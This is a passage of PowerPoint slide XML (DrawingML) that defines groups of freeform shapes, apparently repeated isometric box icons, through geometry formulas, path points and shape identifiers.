                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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10" name="Freeform 87">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9547064-5736-445E-90CC-3A1F959E133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3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030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11" name="Freeform 88">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C77BA897-3A7E-449B-9630-CFFDB192426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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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12" name="Freeform 89">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC88359-1BCB-4477-9686-4BFAA2B0CDD1}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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13" name="Freeform 90">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{948A33A4-0373-4F4A-8982-6B88503DADA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E6E6E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742" name="Group 91">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E213EF59-D0A9-4053-ADAE-FFC6E07134F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079" y="1934"/>
                      <a:ext cx="1300" cy="574"/>
                      <a:chOff x="1079" y="1934"/>
                      <a:chExt cx="1300" cy="574"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="1774" name="Group 92">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F850A4C-3A3C-4CD8-980F-0F39794A3CCA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 flipH="1">
                        <a:off x="1946" y="1934"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1799" name="Freeform 93">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B7CAD1A-53A4-4129-9E1D-64DB70EAC56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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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00" name="Freeform 94">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BCC392D-1060-4EC8-B778-0BD2DE0582A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3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030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01" name="Freeform 95">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{015B173C-A2AC-42BF-80BB-508066177C4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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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02" name="Freeform 96">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73A3C646-530F-4292-B90B-C3C93E02A550}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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803" name="Freeform 97">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2042755E-77C9-4621-BFA9-9DD5953ACF5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E6E6E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775" name="Group 98">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4A49AE7-778A-415B-89CC-13006353C04A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 flipH="1">
                        <a:off x="1728" y="1992"/>
                        <a:ext cx="434" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1794" name="Freeform 99">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE25C19-EDB0-4477-94AE-E08B4D14C6E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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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95" name="Freeform 100">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DDDCD00-761B-4BE3-949A-D0A94FBC77C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3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030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96" name="Freeform 101">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{738306DF-AC44-4473-8947-95897CBCBE9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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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97" name="Freeform 102">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F7B166-B66A-4743-8CBB-C675B8C9F0FE}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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98" name="Freeform 103">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2594581D-9043-4CCF-A2B7-5D2AA1F7186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E6E6E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776" name="Group 104">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F6C978-0838-4C86-A39C-BB4D8A37572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 flipH="1">
                        <a:off x="1512" y="2050"/>
                        <a:ext cx="433" cy="342"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1789" name="Freeform 105">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E823829-6E33-4243-9E18-F310A4364D3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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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90" name="Freeform 106">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0BA5ABB-11CC-41FE-AB2A-1E52571D33C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3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030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91" name="Freeform 107">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C4FD17-5EE0-4E07-8E83-3F999873DFE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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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92" name="Freeform 108">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6242797-BC07-486A-A21C-76B9DE15A072}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
